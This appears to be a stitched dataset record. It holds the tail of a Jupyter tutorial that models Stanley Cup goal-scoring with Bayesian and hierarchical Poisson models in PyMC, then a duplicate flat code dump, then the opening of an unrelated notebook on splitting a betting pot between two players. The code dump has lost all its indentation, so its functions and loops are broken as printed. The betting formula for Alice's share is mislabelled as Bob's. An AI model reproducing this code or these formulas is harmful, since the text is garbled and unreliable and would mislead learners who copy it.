sample_prior_pred = np.random.poisson(sample_prior)
np.mean(sample_prior_pred)
```
Looks good.
```
plot_cdf(sample_prior_pred, label='prior pred')
plot_cdf(sample_prior_pred_pm, label='prior pred pymc')
cdf_goals()
```
## Using PyMC
Finally, we are ready to use PyMC for actual inference. We just have to make one small change.
Instead of generating `goals`, we'll mark goals as `observed` and provide the observed data, `6`:
```
model = pm.Model()
with model:
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu, observed=[6])
trace = pm.sample(2000, tune=1000)
```
With `goals` fixed, the only unknown is `mu`, so `trace` contains a sample drawn from the posterior distribution of `mu`. We can plot the posterior using a function provided by PyMC:
```
pm.plot_posterior(trace)
pdf_rate()
```
And we can extract a sample from the posterior of `mu`
```
sample_post_pm = trace['mu']
np.mean(sample_post_pm)
```
And compare it to the sample we drew from the grid approximation:
```
plot_cdf(sample_post, label='posterior grid')
plot_cdf(sample_post_pm, label='posterior pymc')
cdf_rates()
```
Again, it looks pretty good.
To generate a posterior predictive distribution, we can use `sample_posterior_predictive`
```
with model:
post_pred = pm.sample_posterior_predictive(trace, samples=2000)
```
Here's what it looks like:
```
sample_post_pred_pm = post_pred['goals'].flatten()
sample_post_pred_pm.shape
sample_post_pred_pm = post_pred['goals']
np.mean(sample_post_pred_pm)
plot_cdf(sample_post_pred, label='posterior pred grid')
plot_cdf(sample_post_pred_pm, label='posterior pred pm')
cdf_goals()
```
Look's pretty good!
## Going hierarchical
So far, all of this is based on a gamma prior. To choose the parameters of the prior, I used data from previous Stanley Cup finals and computed a maximum likelihood estimate (MLE). But that's not correct, because
1. It assumes that the observed goal counts are the long-term goal-scoring rates.
2. It treats `alpha` and `beta` as known values rather than parameters to estimate.
In other words, I have ignored two important sources of uncertainty. As a result, my predictions are almost certainly too confident.
The solution is a hierarchical model, where `alpha` and `beta` are the parameters that control `mu` and `mu` is the parameter that controls `goals`. Then we can use observed `goals` to update the distributions of all three unknown parameters.
Of course, now we need a prior distribution for `alpha` and `beta`. A common choice is the half Cauchy distribution (see [Gelman](http://www.stat.columbia.edu/~gelman/research/published/taumain.pdf)), but on advice of counsel, I'm going with exponential.
```
sample = pm.Exponential.dist(lam=1).random(size=1000)
plot_cdf(sample)
plt.xscale('log')
plt.xlabel('Parameter of a gamma distribution')
plt.ylabel('CDF')
np.mean(sample)
```
This distribution represents radical uncertainty about the value of this distribution: it's probably between 0.1 and 10, but it could be really big or really small.
Here's a PyMC model that generates `alpha` and `beta` from an exponential distribution.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
trace = pm.sample_prior_predictive(1000)
```
Here's what the distributions of `alpha` and `beta` look like.
```
sample_prior_alpha = trace['alpha']
plot_cdf(sample_prior_alpha, label='alpha prior')
sample_prior_beta = trace['beta']
plot_cdf(sample_prior_beta, label='beta prior')
plt.xscale('log')
plt.xlabel('Parameter of a gamma distribution')
plt.ylabel('CDF')
np.mean(sample_prior_alpha)
```
Now that we have `alpha` and `beta`, we can generate `mu`.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = pm.Gamma('mu', alpha, beta)
trace = pm.sample_prior_predictive(1000)
```
Here's what the prior distribution of `mu` looks like.
```
sample_prior_mu = trace['mu']
plot_cdf(sample_prior_mu, label='mu prior hierarchical')
cdf_rates()
np.mean(sample_prior_mu)
```
In effect, the model is saying "I have never seen a hockey game before. As far as I know, it could be soccer, could be basketball, could be pinball."
If we zoom in on the range 0 to 10, we can compare the prior implied by the hierarchical model with the gamma prior I hand picked.
```
plot_cdf(sample_prior_mu, label='mu prior hierarchical')
plot_cdf(sample_prior, label='mu prior', color='gray')
plt.xlim(0, 10)
cdf_rates()
```
Obviously, they are very different. They agree that the most likely values are less than 10, but the hierarchical model admits the possibility that `mu` could be orders of magnitude bigger.
Crazy as it sounds, that's probably what we want in a non-committal prior.
Ok, last step of the forward process, let's generate some goals.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu)
trace = pm.sample_prior_predictive(1000)
```
Here's the prior predictive distribution of goals.
```
sample_prior_goals = trace['goals']
plot_cdf(sample_prior_goals, label='goals prior')
cdf_goals()
np.mean(sample_prior_goals)
```
To see whether that distribution is right, I ran samples using SciPy.
```
def forward_hierarchical(size=1):
alpha = st.expon().rvs(size=size)
beta = st.expon().rvs(size=size)
mu = st.gamma(a=alpha, scale=1/beta).rvs(size=size)
goals = st.poisson(mu).rvs(size=size)
return goals[0]
sample_prior_goals_st = [forward_hierarchical() for i in range(1000)];
plot_cdf(sample_prior_goals, label='goals prior')
plot_cdf(sample_prior_goals_st, label='goals prior scipy')
cdf_goals()
plt.xlim(0, 50)
plt.legend(loc='lower right')
np.mean(sample_prior_goals_st)
```
## Hierarchical inference
Once we have the forward process working, we only need a small change to run the reverse process.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu, observed=[6])
trace = pm.sample(1000, tune=2000, nuts_kwargs=dict(target_accept=0.99))
```
Here's the posterior distribution of `mu`. The posterior mean is close to the observed value, which is what we expect with a weakly informative prior.
```
sample_post_mu = trace['mu']
plot_cdf(sample_post_mu, label='mu posterior')
cdf_rates()
np.mean(sample_post_mu)
```
## Two teams
We can extend the model to estimate different values of `mu` for the two teams.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu_VGK = pm.Gamma('mu_VGK', alpha, beta)
mu_WSH = pm.Gamma('mu_WSH', alpha, beta)
goals_VGK = pm.Poisson('goals_VGK', mu_VGK, observed=[6])
goals_WSH = pm.Poisson('goals_WSH', mu_WSH, observed=[4])
trace = pm.sample(1000, tune=2000, nuts_kwargs=dict(target_accept=0.95))
```
We can use `traceplot` to review the results and do some visual diagnostics.
```
pm.traceplot(trace);
```
Here are the posterior distribitions for `mu_WSH` and `mu_VGK`.
```
sample_post_mu_WSH = trace['mu_WSH']
plot_cdf(sample_post_mu_WSH, label='mu_WSH posterior')
sample_post_mu_VGK = trace['mu_VGK']
plot_cdf(sample_post_mu_VGK, label='mu_VGK posterior')
cdf_rates()
np.mean(sample_post_mu_WSH), np.mean(sample_post_mu_VGK)
```
On the basis of one game (and never having seen a previous game), here's the probability that Vegas is the better team.
```
np.mean(sample_post_mu_VGK > sample_post_mu_WSH)
```
## More background
But let's take advantage of more information. Here are the results from the five most recent Stanley Cup finals, ignoring games that went into overtime.
```
data = dict(BOS13 = [2, 1, 2],
CHI13 = [0, 3, 3],
NYR14 = [0, 2],
LAK14 = [3, 1],
TBL15 = [1, 4, 3, 1, 1, 0],
CHI15 = [2, 3, 2, 2, 2, 2],
SJS16 = [2, 1, 4, 1],
PIT16 = [3, 3, 2, 3],
NSH17 = [3, 1, 5, 4, 0, 0],
PIT17 = [5, 4, 1, 1, 6, 2],
VGK18 = [6,2,1],
WSH18 = [4,3,3],
)
```
Here's how we can get the data into the model.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = dict()
goals = dict()
for name, observed in data.items():
mu[name] = pm.Gamma('mu_'+name, alpha, beta)
goals[name] = pm.Poisson(name, mu[name], observed=observed)
trace = pm.sample(1000, tune=2000, nuts_kwargs=dict(target_accept=0.95))
```
And here are the results.
```
pm.traceplot(trace);
```
Here are the posterior means.
```
sample_post_mu_VGK = trace['mu_VGK18']
np.mean(sample_post_mu_VGK)
sample_post_mu_WSH = trace['mu_WSH18']
np.mean(sample_post_mu_WSH)
```
They are lower with the background information than without, and closer together. Here's the updated chance that Vegas is the better team.
```
np.mean(sample_post_mu_VGK > sample_post_mu_WSH)
```
## Predictions
Even if Vegas is the better team, that doesn't mean they'll win the next game.
We can use `sample_posterior_predictive` to generate predictions.
```
with model:
post_pred = pm.sample_posterior_predictive(trace, samples=1000)
```
Here are the posterior predictive distributions of goals scored.
```
WSH = post_pred['WSH18']
WSH.shape
WSH = post_pred['WSH18'].flatten()
VGK = post_pred['VGK18'].flatten()
plot_cdf(WSH, label='WSH')
plot_cdf(VGK, label='VGK')
cdf_goals()
```
Here's the chance that Vegas wins the next game.
```
win = np.mean(VGK > WSH)
win
```
The chance that they lose.
```
lose = np.mean(WSH > VGK)
lose
```
And the chance of a tie.
```
tie = np.mean(WSH == VGK)
tie
```
## Overtime!
In the playoffs, you play overtime periods until someone scores. No stupid shootouts!
In a Poisson process with rate parameter `mu`, the time until the next event is exponential with parameter `lam = 1/mu`.
So we can take a sample from the posterior distributions of `mu`:
```
mu_VGK = trace['mu_VGK18']
mu_WSH = trace['mu_WSH18']
```
And generate time to score,`tts`, for each team:
```
tts_VGK = np.random.exponential(1/mu_VGK)
np.mean(tts_VGK)
tts_WSH = np.random.exponential(1/mu_WSH)
np.mean(tts_WSH)
```
Here's the chance that Vegas wins in overtime.
```
win_ot = np.mean(tts_VGK < tts_WSH)
win_ot
```
Since `tts` is continuous, ties are unlikely.
```
total_win = win + tie * win_ot
total_win
```
Finally, we can simulate the rest of the series and compute the probability that Vegas wins the series.
```
def flip(p):
"""Simulate a single game."""
return np.random.random() < p
def series(wins, losses, p_win):
"""Simulate a series.
wins: number of wins so far
losses: number of losses so far
p_win: probability that the team of interest wins a game
returns: boolean, whether the team of interest wins the series
"""
while True:
if flip(p_win):
wins += 1
else:
losses += 1
if wins==4:
return True
if losses==4:
return False
series(1, 2, total_win)
t = [series(1, 2, total_win) for i in range(1000)]
np.mean(t)
```
|
github_jupyter
|
pip3 install -U git+https://github.com/pymc-devs/pymc3.git
from __future__ import print_function, division
%matplotlib inline
%config InteractiveShell.ast_node_interactivity='last_expr_or_assign'
import numpy as np
import pymc3 as pm
import matplotlib.pyplot as plt
lam_per_game = 2.7
min_per_game = 60
lam_per_min = lam_per_game / min_per_game
lam_per_min, lam_per_min**2
np.random.random(min_per_game)
np.random.random(min_per_game) < lam_per_min
np.sum(np.random.random(min_per_game) < lam_per_min)
def half_game(lam_per_min, min_per_game=60):
return np.sum(np.random.random(min_per_game) < lam_per_min)
size = 10
sample = [half_game(lam_per_min) for i in range(size)]
size = 1000
sample_sim = [half_game(lam_per_min) for i in range(size)]
np.mean(sample_sim), lam_per_game
from collections import Counter
class Pmf(Counter):
def normalize(self):
"""Normalizes the PMF so the probabilities add to 1."""
total = sum(self.values())
for key in self:
self[key] /= total
def sorted_items(self):
"""Returns the outcomes and their probabilities."""
return zip(*sorted(self.items()))
plot_options = dict(linewidth=3, alpha=0.6)
def underride(options):
"""Add key-value pairs to d only if key is not in d.
options: dictionary
"""
for key, val in plot_options.items():
options.setdefault(key, val)
return options
def plot(xs, ys, **options):
"""Line plot with plot_options."""
plt.plot(xs, ys, **underride(options))
def bar(xs, ys, **options):
"""Bar plot with plot_options."""
plt.bar(xs, ys, **underride(options))
def plot_pmf(sample, **options):
"""Compute and plot a PMF."""
pmf = Pmf(sample)
pmf.normalize()
xs, ps = pmf.sorted_items()
bar(xs, ps, **options)
def pmf_goals():
"""Decorate the axes."""
plt.xlabel('Number of goals')
plt.ylabel('PMF')
plt.title('Distribution of goals scored')
legend()
def legend(**options):
"""Draw a legend only if there are labeled items.
"""
ax = plt.gca()
handles, labels = ax.get_legend_handles_labels()
if len(labels):
plt.legend(**options)
plot_pmf(sample_sim, label='simulation')
pmf_goals()
n = min_per_game
p = lam_per_min
sample_bin = np.random.binomial(n, p, size)
np.mean(sample_bin)
plot_pmf(sample_sim, label='simulation')
plot_pmf(sample_bin, label='binomial')
pmf_goals()
def plot_cdf(sample, **options):
"""Compute and plot the CDF of a sample."""
pmf = Pmf(sample)
xs, freqs = pmf.sorted_items()
ps = np.cumsum(freqs, dtype=np.float)
ps /= ps[-1]
plot(xs, ps, **options)
def cdf_rates():
"""Decorate the axes."""
plt.xlabel('Goal scoring rate (mu)')
plt.ylabel('CDF')
plt.title('Distribution of goal scoring rate')
legend()
def cdf_goals():
"""Decorate the axes."""
plt.xlabel('Number of goals')
plt.ylabel('CDF')
plt.title('Distribution of goals scored')
legend()
def plot_cdfs(*sample_seq, **options):
"""Plot multiple CDFs."""
for sample in sample_seq:
plot_cdf(sample, **options)
cdf_goals()
plot_cdf(sample_sim, label='simulation')
plot_cdf(sample_bin, label='binomial')
cdf_goals()
mu = lam_per_game
sample_poisson = np.random.poisson(mu, size)
np.mean(sample_poisson)
plot_cdfs(sample_sim, sample_bin)
plot_cdf(sample_poisson, label='poisson', linestyle='dashed')
legend()
model = pm.Model()
with model:
goals = pm.Poisson('goals', mu)
trace = pm.sample_prior_predictive(1000)
len(trace['goals'])
sample_pm = trace['goals']
np.mean(sample_pm)
plot_cdfs(sample_sim, sample_bin, sample_poisson)
plot_cdf(sample_pm, label='poisson pymc', linestyle='dashed')
legend()
import scipy.stats as st
xs = np.arange(11)
ps = st.poisson.cdf(xs, mu)
plot_cdfs(sample_sim, sample_bin, sample_poisson, sample_pm)
plt.plot(xs, ps, label='analytic', linestyle='dashed')
legend()
xs = np.arange(11)
ps = st.poisson.pmf(xs, mu)
bar(xs, ps, label='analytic PMF')
pmf_goals()
def poisson_likelihood(goals, mu):
"""Probability of goals given scoring rate.
goals: observed number of goals (scalar or sequence)
mu: hypothetical goals per game
returns: probability
"""
return np.prod(st.poisson.pmf(goals, mu))
poisson_likelihood(goals=6, mu=2.7)
poisson_likelihood(goals=3, mu=2.7)
poisson_likelihood(goals=[6, 2], mu=2.7)
class Suite(Pmf):
"""Represents a set of hypotheses and their probabilities."""
def bayes_update(self, data, like_func):
"""Perform a Bayesian update.
data: some representation of observed data
like_func: likelihood function that takes (data, hypo), where
hypo is the hypothetical value of some parameter,
and returns P(data | hypo)
"""
for hypo in self:
self[hypo] *= like_func(data, hypo)
self.normalize()
def plot(self, **options):
"""Plot the hypotheses and their probabilities."""
xs, ps = self.sorted_items()
plot(xs, ps, **options)
def pdf_rate():
"""Decorate the axes."""
plt.xlabel('Goals per game (mu)')
plt.ylabel('PDF')
plt.title('Distribution of goal scoring rate')
legend()
hypo_mu = np.linspace(0, 20, num=51)
hypo_mu
suite = Suite(hypo_mu)
suite.normalize()
suite.plot(label='prior')
pdf_rate()
suite.bayes_update(data=6, like_func=poisson_likelihood)
suite.plot(label='posterior')
pdf_rate()
xs = [13/6, 19/6, 8/4, 4/4, 10/6, 13/6, 2/2, 4/2, 5/3, 6/3]
def estimate_gamma_params(xs):
"""Estimate the parameters of a gamma distribution.
See https://en.wikipedia.org/wiki/Gamma_distribution#Parameter_estimation
"""
s = np.log(np.mean(xs)) - np.mean(np.log(xs))
k = (3 - s + np.sqrt((s-3)**2 + 24*s)) / 12 / s
theta = np.mean(xs) / k
alpha = k
beta = 1 / theta
return alpha, beta
alpha, beta = estimate_gamma_params(xs)
print(alpha, beta)
def make_gamma_dist(alpha, beta):
"""Returns a frozen distribution with given parameters.
"""
return st.gamma(a=alpha, scale=1/beta)
dist = make_gamma_dist(alpha, beta)
print(dist.mean(), dist.std())
hypo_mu = np.linspace(0, 10, num=101)
ps = dist.pdf(hypo_mu)
plot(hypo_mu, ps, label='gamma(9.6, 5.1)')
pdf_rate()
def make_gamma_suite(xs, alpha, beta):
"""Makes a suite based on a gamma distribution.
xs: places to evaluate the PDF
alpha, beta: parameters of the distribution
returns: Suite
"""
dist = make_gamma_dist(alpha, beta)
ps = dist.pdf(xs)
prior = Suite(dict(zip(xs, ps)))
prior.normalize()
return prior
prior = make_gamma_suite(hypo_mu, alpha, beta)
prior.plot(label='gamma prior')
pdf_rate()
posterior = prior.copy()
posterior.bayes_update(data=6, like_func=poisson_likelihood)
prior.plot(label='prior')
posterior.plot(label='posterior')
pdf_rate()
suite.plot(label='posterior with uniform prior', color='gray')
posterior.plot(label='posterior with gamma prior', color=COLORS[1])
pdf_rate()
posterior2 = posterior.copy()
posterior2.bayes_update(data=2, like_func=poisson_likelihood)
prior.plot(label='prior')
posterior.plot(label='posterior')
posterior2.plot(label='posterior2')
pdf_rate()
posterior3 = prior.copy()
posterior3.bayes_update(data=[6, 2], like_func=poisson_likelihood)
prior.plot(label='prior')
posterior.plot(label='posterior')
posterior2.plot(label='posterior2')
posterior3.plot(label='posterior3', linestyle='dashed')
pdf_rate()
class GammaSuite:
"""Represents a gamma conjugate prior/posterior."""
def __init__(self, alpha, beta):
"""Initialize.
alpha, beta: parameters
dist: frozen distribution from scipy.stats
"""
self.alpha = alpha
self.beta = beta
self.dist = make_gamma_dist(alpha, beta)
def plot(self, xs, **options):
"""Plot the suite.
xs: locations where we should evaluate the PDF.
"""
ps = self.dist.pdf(xs)
ps /= np.sum(ps)
plot(xs, ps, **options)
def bayes_update(self, data):
return GammaSuite(self.alpha+data, self.beta+1)
gamma_prior = GammaSuite(alpha, beta)
gamma_prior.plot(hypo_mu, label='prior')
pdf_rate()
gamma_prior.dist.mean()
gamma_posterior = gamma_prior.bayes_update(6)
gamma_prior.plot(hypo_mu, label='prior')
gamma_posterior.plot(hypo_mu, label='posterior')
pdf_rate()
gamma_posterior.dist.mean()
gamma_prior.plot(hypo_mu, label='prior')
gamma_posterior.plot(hypo_mu, label='posterior conjugate')
posterior.plot(label='posterior grid', linestyle='dashed')
pdf_rate()
def sample_suite(suite, size):
"""Draw a random sample from a Suite
suite: Suite object
size: sample size
"""
xs, ps = zip(*suite.items())
return np.random.choice(xs, size, replace=True, p=ps)
size = 10000
sample_post = sample_suite(posterior, size)
np.mean(sample_post)
plot_cdf(sample_post, label='posterior sample')
cdf_rates()
sample_post_pred = np.random.poisson(sample_post)
np.mean(sample_post_pred)
plot_pmf(sample_post_pred, label='posterior predictive sample')
pmf_goals()
mu_mean = np.mean(sample_post)
sample_post_pred_wrong = np.random.poisson(mu_mean, size)
np.mean(sample_post_pred_wrong)
plot_cdf(sample_post_pred, label='posterior predictive sample')
plot_cdf(sample_post_pred_wrong, label='incorrect posterior predictive')
cdf_goals()
print(np.mean(sample_post_pred), np.mean(sample_post_pred_wrong))
print(np.std(sample_post_pred), np.std(sample_post_pred_wrong))
print(alpha, beta)
model = pm.Model()
with model:
mu = pm.Gamma('mu', alpha, beta)
trace = pm.sample_prior_predictive(1000)
sample_prior_pm = trace['mu']
np.mean(sample_prior_pm)
sample_prior = sample_suite(prior, 2000)
np.mean(sample_prior)
plot_cdf(sample_prior, label='prior')
plot_cdf(sample_prior_pm, label='prior pymc')
cdf_rates()
model = pm.Model()
with model:
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu, observed=[6])
trace = pm.sample_prior_predictive(2000)
sample_prior_pred_pm = trace['goals'].flatten()
np.mean(sample_prior_pred_pm)
sample_prior_pred = np.random.poisson(sample_prior)
np.mean(sample_prior_pred)
plot_cdf(sample_prior_pred, label='prior pred')
plot_cdf(sample_prior_pred_pm, label='prior pred pymc')
cdf_goals()
model = pm.Model()
with model:
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu, observed=[6])
trace = pm.sample(2000, tune=1000)
pm.plot_posterior(trace)
pdf_rate()
sample_post_pm = trace['mu']
np.mean(sample_post_pm)
plot_cdf(sample_post, label='posterior grid')
plot_cdf(sample_post_pm, label='posterior pymc')
cdf_rates()
with model:
post_pred = pm.sample_posterior_predictive(trace, samples=2000)
sample_post_pred_pm = post_pred['goals'].flatten()
sample_post_pred_pm.shape
sample_post_pred_pm = post_pred['goals']
np.mean(sample_post_pred_pm)
plot_cdf(sample_post_pred, label='posterior pred grid')
plot_cdf(sample_post_pred_pm, label='posterior pred pm')
cdf_goals()
sample = pm.Exponential.dist(lam=1).random(size=1000)
plot_cdf(sample)
plt.xscale('log')
plt.xlabel('Parameter of a gamma distribution')
plt.ylabel('CDF')
np.mean(sample)
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
trace = pm.sample_prior_predictive(1000)
sample_prior_alpha = trace['alpha']
plot_cdf(sample_prior_alpha, label='alpha prior')
sample_prior_beta = trace['beta']
plot_cdf(sample_prior_beta, label='beta prior')
plt.xscale('log')
plt.xlabel('Parameter of a gamma distribution')
plt.ylabel('CDF')
np.mean(sample_prior_alpha)
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = pm.Gamma('mu', alpha, beta)
trace = pm.sample_prior_predictive(1000)
sample_prior_mu = trace['mu']
plot_cdf(sample_prior_mu, label='mu prior hierarchical')
cdf_rates()
np.mean(sample_prior_mu)
plot_cdf(sample_prior_mu, label='mu prior hierarchical')
plot_cdf(sample_prior, label='mu prior', color='gray')
plt.xlim(0, 10)
cdf_rates()
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu)
trace = pm.sample_prior_predictive(1000)
sample_prior_goals = trace['goals']
plot_cdf(sample_prior_goals, label='goals prior')
cdf_goals()
np.mean(sample_prior_goals)
def forward_hierarchical(size=1):
alpha = st.expon().rvs(size=size)
beta = st.expon().rvs(size=size)
mu = st.gamma(a=alpha, scale=1/beta).rvs(size=size)
goals = st.poisson(mu).rvs(size=size)
return goals[0]
sample_prior_goals_st = [forward_hierarchical() for i in range(1000)];
plot_cdf(sample_prior_goals, label='goals prior')
plot_cdf(sample_prior_goals_st, label='goals prior scipy')
cdf_goals()
plt.xlim(0, 50)
plt.legend(loc='lower right')
np.mean(sample_prior_goals_st)
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu, observed=[6])
trace = pm.sample(1000, tune=2000, nuts_kwargs=dict(target_accept=0.99))
sample_post_mu = trace['mu']
plot_cdf(sample_post_mu, label='mu posterior')
cdf_rates()
np.mean(sample_post_mu)
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu_VGK = pm.Gamma('mu_VGK', alpha, beta)
mu_WSH = pm.Gamma('mu_WSH', alpha, beta)
goals_VGK = pm.Poisson('goals_VGK', mu_VGK, observed=[6])
goals_WSH = pm.Poisson('goals_WSH', mu_WSH, observed=[4])
trace = pm.sample(1000, tune=2000, nuts_kwargs=dict(target_accept=0.95))
pm.traceplot(trace);
sample_post_mu_WSH = trace['mu_WSH']
plot_cdf(sample_post_mu_WSH, label='mu_WSH posterior')
sample_post_mu_VGK = trace['mu_VGK']
plot_cdf(sample_post_mu_VGK, label='mu_VGK posterior')
cdf_rates()
np.mean(sample_post_mu_WSH), np.mean(sample_post_mu_VGK)
np.mean(sample_post_mu_VGK > sample_post_mu_WSH)
data = dict(BOS13 = [2, 1, 2],
CHI13 = [0, 3, 3],
NYR14 = [0, 2],
LAK14 = [3, 1],
TBL15 = [1, 4, 3, 1, 1, 0],
CHI15 = [2, 3, 2, 2, 2, 2],
SJS16 = [2, 1, 4, 1],
PIT16 = [3, 3, 2, 3],
NSH17 = [3, 1, 5, 4, 0, 0],
PIT17 = [5, 4, 1, 1, 6, 2],
VGK18 = [6,2,1],
WSH18 = [4,3,3],
)
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = dict()
goals = dict()
for name, observed in data.items():
mu[name] = pm.Gamma('mu_'+name, alpha, beta)
goals[name] = pm.Poisson(name, mu[name], observed=observed)
trace = pm.sample(1000, tune=2000, nuts_kwargs=dict(target_accept=0.95))
pm.traceplot(trace);
sample_post_mu_VGK = trace['mu_VGK18']
np.mean(sample_post_mu_VGK)
sample_post_mu_WSH = trace['mu_WSH18']
np.mean(sample_post_mu_WSH)
np.mean(sample_post_mu_VGK > sample_post_mu_WSH)
with model:
post_pred = pm.sample_posterior_predictive(trace, samples=1000)
WSH = post_pred['WSH18']
WSH.shape
WSH = post_pred['WSH18'].flatten()
VGK = post_pred['VGK18'].flatten()
plot_cdf(WSH, label='WSH')
plot_cdf(VGK, label='VGK')
cdf_goals()
win = np.mean(VGK > WSH)
win
lose = np.mean(WSH > VGK)
lose
tie = np.mean(WSH == VGK)
tie
mu_VGK = trace['mu_VGK18']
mu_WSH = trace['mu_WSH18']
tts_VGK = np.random.exponential(1/mu_VGK)
np.mean(tts_VGK)
tts_WSH = np.random.exponential(1/mu_WSH)
np.mean(tts_WSH)
win_ot = np.mean(tts_VGK < tts_WSH)
win_ot
total_win = win + tie * win_ot
total_win
def flip(p):
"""Simulate a single game."""
return np.random.random() < p
def series(wins, losses, p_win):
"""Simulate a series.
wins: number of wins so far
losses: number of losses so far
p_win: probability that the team of interest wins a game
returns: boolean, whether the team of interest wins the series
"""
while True:
if flip(p_win):
wins += 1
else:
losses += 1
if wins==4:
return True
if losses==4:
return False
series(1, 2, total_win)
t = [series(1, 2, total_win) for i in range(1000)]
np.mean(t)
| 0.908214 | 0.981058 |
# Exploring prediction markets
> I want to explore some ideas about making bets
- toc: true
- badges: true
- comments: true
- categories: [prediction markets, betting]
# Alice and Bob bets on the election
Alice and Bob are rational agents with their own current beliefs about whether Mr. T. will win the election. Mr. T. will either win or not, and so they view it as a Bernoulli variable $X$. Truly $X \sim \text{Ber}(\theta_{true})$.
Alice and Bob both have point estimates about the probability. They are $\theta_{a}$ and $\theta_{b}$ respectively, and therefore their beliefs are represented by their belief distributions $p_{a}(x) = \text{Ber}(x; \theta_{a})$ and $p_{b}(x) = \text{Ber}(x; \theta_{b})$.
How can Alice and Bob set up a bet they are both satisfied with?
# How do we split the pot?
The first idea Alice and Bob have is the following: They both put 50 cent in a pot, so now there is 1 dollar in the pot. When the election is over Alice and Bob will be honest with each about who truly won the election, so after the outcome of $X$ is revealed there will be no dispute.
How will they split the pot? Their first idea is the following. A gets fraction $f_a$ of the outcome,
$$
f_b(x) = \frac{p_a(x)}{p_a(x) + p_b(x)}
$$
Then *given* that A has belief $p_a$, A should expect to win
$$
\mathbb{E}_{x \sim p_a}[f_a(x)] = \theta_a \frac{\theta_a}{\theta_a + \theta_b} + (1-\theta_a) \frac{1 - \theta_a}{(1-\theta_a) + (1-\theta_b)}
$$
Likewise B expects $\mathbb{E}_{x \sim p_b}[f_b]$. Making a rule that $\theta_a$ and $\theta_b$ should be in the open interval $(0,1)$ - no absolute certainty - is sufficient condition for this expectation being defined, since then there is no division by zero. Also, only a Sith deals in absolutes.
If instead of just two players and two outcomes, there are $M$ players and $K$ outcomes (a categorical variable), then an equivalent rule for how much each player $m$ should get would be
$$
f_m(k) = \frac{p_m(k)}{\sum_{i=1}^{M} p_i(k)}
$$
and player $m$ would expect to win
$$\mathbb{E}_{k \sim p_m}[f_m(k)] = \sum_{k=1}p_m(k) f_m(k) = \sum_{k=1} p_m(k) \frac{p_m(k)}{\sum_{i=1}^{M} p_i(k)}$$
We could call $\mathbb{E}_{k \sim p_m}[f_m(k)]$ the "open self-expected prize" for player $m$ and denote it $Z_m$. It is "open" because it is a function of all the probabilities, so Alice would only be able to compute it if she knew the probabilities of all the others. It is "self-expected" because Alice computes the expectation with respect to her own beliefs about the outcome.
# Would Alice and Bob participate in such a bet?
If the $m$ players contribute an equal amount to the pot, then the fraction of the pot they will have at stake is $\frac{1}{M}$ dollars. Alice realized the same thing, that she expects to win $Z_a$. She is willing to participate in the bet if she does not expect to win less than what she has at stake. That means, a player $m$ is willing to participate if
$$
Z_m \geq \frac{1}{M}
$$
For finite number of agents $M$ and finite number of outcomes $K$, this inequality always holds. See [this MathOverflow post](https://mathoverflow.net/questions/416333/inequality-for-matrix-with-rows-summing-to-1). Thanks Federico Poloni and Iosif Pinelis!
Intuitively this tells us, that no matter what Bob thought, Alice would be able to compute $Z_a$ and come out in favor of participating in the bet. Likewise would Bob.
# Bob says his belief, now Alice wants to lie!
Let's say that Bob told Alice that his belief was $\theta_b = .3$. Assume that truly Alice has belief $\theta_a = .5$.
We can view all of this as a matrix $P$ showing the belief.
```
#collapse_hide
import torch
P = torch.tensor([
[.5,.5],
[.7,.3]
])
print('P:',P)
```
Then $Z_m$ is computed as follows
```
def Z(m,P):
return P[m] @ (P[m] / P.sum(dim=0))
```
Alice and Bob have exactly the same $Z$. For more players than two, this will not be the case.
```
#collapse_hide
print('Z_a : ', Z(0,P).item())
print('Z_b : ', Z(1,P).item())
```
But we just said that Bob said his belief first, so now the question is - would Alice want to lie about her beliefs in order to win more? To think about this we have to distinguish between the belief-distribution and the commit-distribution. For now we assume that players never change their real beliefs about the outcome, but they might present a different distribution:
We write $q_a = \text{Ber}(\theta'_a)$ to denote the distribution with which Alice participates in the bet, so she will get
$$f'_a(x) = \frac{q_a(x)}{q_a(x) + q_b(x)}$$
With this change we can look at what a player $m$ expects to win $W_m = \mathbb{E}_{x \sim p_m}[f'_m(x)]$. The expectation is with respect to what the player truly belives about what will happen, but the public distribution $q_m(x)$ is what is used to compute the fraction.
```
def W(m,P,Q):
return P[m] @ (Q[m] / Q.sum(dim=0))
```
What if Alice chose to lie, and say that her belief is $.49$ instead of $.5$? Then her self-expectation $W_a > Z_a$, she would be better off by being dishonest:
```
#collapse_hide
import torch
#qap = 0.99999
Q = torch.tensor([
[.51,.49],
[.7,.3]
])
print('Q:', Q)
print('W_a : ', W(0,P,Q).item())
print('W_b : ', W(1,P,Q).item())
print('Alice is better off lying:', (W(0,P,Q) > Z(0,P)).item())
```
Notice that while the $Z$ vector is public, known by all players, the $W_m$ is only known by player $m$.
```
#collapse_hide
qaps = torch.linspace(0,1,1000)
